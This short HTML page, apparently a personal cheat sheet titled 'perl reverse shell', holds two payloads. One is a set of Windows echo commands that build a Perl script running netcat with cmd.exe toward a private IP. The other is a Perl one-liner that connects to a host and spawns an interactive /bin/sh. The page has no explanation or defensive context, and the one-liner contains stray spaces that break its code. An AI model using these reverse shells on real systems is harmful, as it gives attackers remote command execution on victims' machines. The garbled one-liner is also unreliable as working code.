<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>perl reverse shell</title>
</head><body>echo #!/usr/bin/perl&gt;backup_perl.pl<br/>
echo use strict;&gt;&gt;backup_perl.pl<br/>
echo my $prog = "c:\\Windows\\System32\\CMD.exe /c c:\\users\\James\\nc.exe 192.168.119.181 80 -e cmd.exe";&gt;&gt;backup_perl.pl<br/>
echo system($prog);&gt;&gt;backup_perl.pl<br/>
<br/>
<br/>
<br/>
perl -e 'use Socket;$i="192.168.xx.xx";$p=22;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(con nect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt; &amp;S");exec("/bin/sh -i");};' <br/>
<br/>
<br/>
</body></html>